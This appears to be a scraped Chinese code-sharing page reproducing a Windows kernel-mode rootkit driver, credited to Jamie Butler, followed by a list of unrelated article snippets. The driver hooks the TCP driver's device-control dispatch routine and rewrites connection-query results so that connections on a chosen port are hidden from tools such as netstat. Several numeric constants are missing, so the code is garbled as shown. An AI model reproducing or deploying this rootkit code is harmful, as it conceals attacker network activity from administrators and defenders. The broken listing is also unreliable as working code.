HideTcpip.c
隐藏tcp端口,来自看雪
///////////////////////////////////////////////////////////////////////////////////////
// Filename Rootkit.c
//
// Author: Jamie Butler
// Email: james.butler@hbgary.com or butlerjr@acm.org
//
// Description: This is where the work gets done.
//
// Version: 1.0
// #include "ntddk.h"
#include "tdiinfo.h"
//#include "stdio.h"
//#include "stdlib.h" #include "Rootkit.h" NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{ NTSTATUS ntStatus; OldIrpMjDeviceControl = NULL; DriverObject->DriverUnload = RootkitUnload; ntStatus = InstallTCPDriverHook();
if(!NT_SUCCESS(ntStatus))
return ntStatus; return STATUS_SUCCESS;
} NTSTATUS InstallTCPDriverHook()
{
NTSTATUS ntStatus;
// UNICODE_STRING deviceNameUnicodeString;
// UNICODE_STRING deviceLinkUnicodeString;
UNICODE_STRING deviceTCPUnicodeString;
WCHAR deviceTCPNameBuffer[] = L"\\Device\\Tcp";
pFile_tcp = NULL;
pDev_tcp = NULL;
pDrv_tcpip = NULL; RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);
ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);
if(!NT_SUCCESS(ntStatus))
{
DbgPrint("读取失败!");
return ntStatus;
}
DbgPrint("读取成功!");
pDrv_tcpip = pDev_tcp->DriverObject; OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];
if (OldIrpMjDeviceControl)
InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl); return STATUS_SUCCESS;
} NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
PIO_STACK_LOCATION irpStack;
ULONG ioTransferType;
TDIObjectID *inputBuffer;
DWORD context; //DbgPrint("The current IRP is at %x\n", Irp); // Get a pointer to the current location in the Irp. This is where
// the function codes and parameters are located.
irpStack = IoGetCurrentIrpStackLocation (Irp); switch (irpStack->MajorFunction)
{
case IRP_MJ_DEVICE_CONTROL:
if ((irpStack->MinorFunction == ) && \
(irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
{
ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
ioTransferType &= ;
if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer
{
inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer; // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP
if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)
{
DbgPrint("Input buffer %x\n",inputBuffer);
if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))
{
// Call our completion routine if IRP successful
irpStack->Control = ;
irpStack->Control |= SL_INVOKE_ON_SUCCESS; // Save old completion routine if present
irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO)); ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;
((PREQINFO)irpStack->Context)->ReqType = inputBuffer->toi_id; // Setup our function to be called on completion of IRP
irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
}
}
}
}
break; default:
break;
} return OldIrpMjDeviceControl(DeviceObject, Irp);
} NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context)
{
PVOID OutputBuffer;
DWORD NumOutputBuffers;
PIO_COMPLETION_ROUTINE p_compRoutine;
DWORD i; // Connection status values:
// 0 = Invisible
// 1 = CLOSED
// 2 = LISTENING
// 3 = SYN_SENT
// 4 = SYN_RECEIVED
// 5 = ESTABLISHED
// 6 = FIN_WAIT_1
// 7 = FIN_WAIT_2
// 8 = CLOSE_WAIT
// 9 = CLOSING
// ... OutputBuffer = Irp->UserBuffer;
p_compRoutine = ((PREQINFO)Context)->OldCompletion; if (((PREQINFO)Context)->ReqType == 0x101)
{
NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
for(i = ; i < NumOutputBuffers; i++)
{
// Hide all Web connections
if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == )
((PCONNINFO101)OutputBuffer)[i].status = ;
}
}
else if (((PREQINFO)Context)->ReqType == 0x102)
{
NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
for(i = ; i < NumOutputBuffers; i++)
{
// Hide all Web connections
if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == )
((PCONNINFO102)OutputBuffer)[i].status = ;
}
}
else if (((PREQINFO)Context)->ReqType == 0x110)
{
NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
for(i = ; i < NumOutputBuffers; i++)
{
// Hide all Web connections
if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == )
((PCONNINFO110)OutputBuffer)[i].status = ;
}
} ExFreePool(Context); /*
for(i = 0; i < NumOutputBuffers; i++)
{
DbgPrint("Status: %d",OutputBuffer[i].status);
DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));
DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));
}*/ if ((Irp->StackCount > (ULONG)) && (p_compRoutine != NULL))
{
return (p_compRoutine)(DeviceObject, Irp, NULL);
}
else
{
return Irp->IoStatus.Status;
}
} NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
if (OldIrpMjDeviceControl)
InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);
if (pFile_tcp != NULL)
ObDereferenceObject(pFile_tcp);
pFile_tcp = NULL; return STATUS_SUCCESS;
}
HideTcpip.c的更多相关文章
随机推荐
- linux 计划任务超时控制和并发控制
Linux crontab 的配置存放 /var/spool/cron 目录下. Linux crontab的日志文件存放再 /var/log/cron* timeout 命令 timeout 给脚本 ...
- Java语言基础(11)
1 构造方法 构造方法是一种特殊的方法,只有在创建对象的时候才被调用,用来执行初始化的操作,比如给属性赋值... 1) 构造方法名字跟类名一致,没有返回值也就没有返回值类型 2) 格式: 类名(参数列 ...
- Array 对象-sort()
Array 对象-sort() sort方法对数组成员进行排序,默认是按照字典顺序排序.排序后,原数组将被改变. sort方法不是按照大小排序,而是按照字典顺序.也就是说,数值会被先转成字符串,再按照 ...
- linux shell介绍
Shell定义 Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口.它接收用户输入的命令并把它送入内核去执行. 实际上Shell是一个命令解释器,它解释由用户输入的命令并且把它们送到内 ...
- Alpha版本
这个作业属于哪个课程 [课程链接][ https://edu.cnblogs.com/campus/xnsy/SoftwareEngineeringClass1/] 这个作业要求在哪里 [作业要求][ ...
- 使用gpg来加密数据
一.数据的加密方式 数据加密有三种方式: 1.对称加密(算法有:DES.AES.3DES.)加密和解密使用同一个密钥 2.非对称加密(RSA.DSA.ELGamal等等)一共四把钥匙,用公钥加密数据, ...
- IDEA 使用LiveEdit插件
第一步: 第二步: 第三步: 第四步: 等待下载完成 第五步: 第六步: 第七步: 配置tomcat时注意选择chrome浏览器,并勾选右边的多选框 完成之后,就可以启动项目了,然后可以改变html代 ...
- JAVA_GET请求URL
import java.io.IOException; import net.sf.json.JSONObject; import org.apache.commons.httpclient.Defa ...
- jmeter-模板报错-Fatal Error! com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException: 2 字节的 UTF-8 序列的字节 2 无效
使用的模板不能有中文!!!!检查模板.
- Prism框架中View与Region关联的几种方式
Prism.Regions命名空间下有2个重要接口:IRegionManager.IRegion IRegionManager接口中的方法与属性:AddToRegion().RegisterViewW ...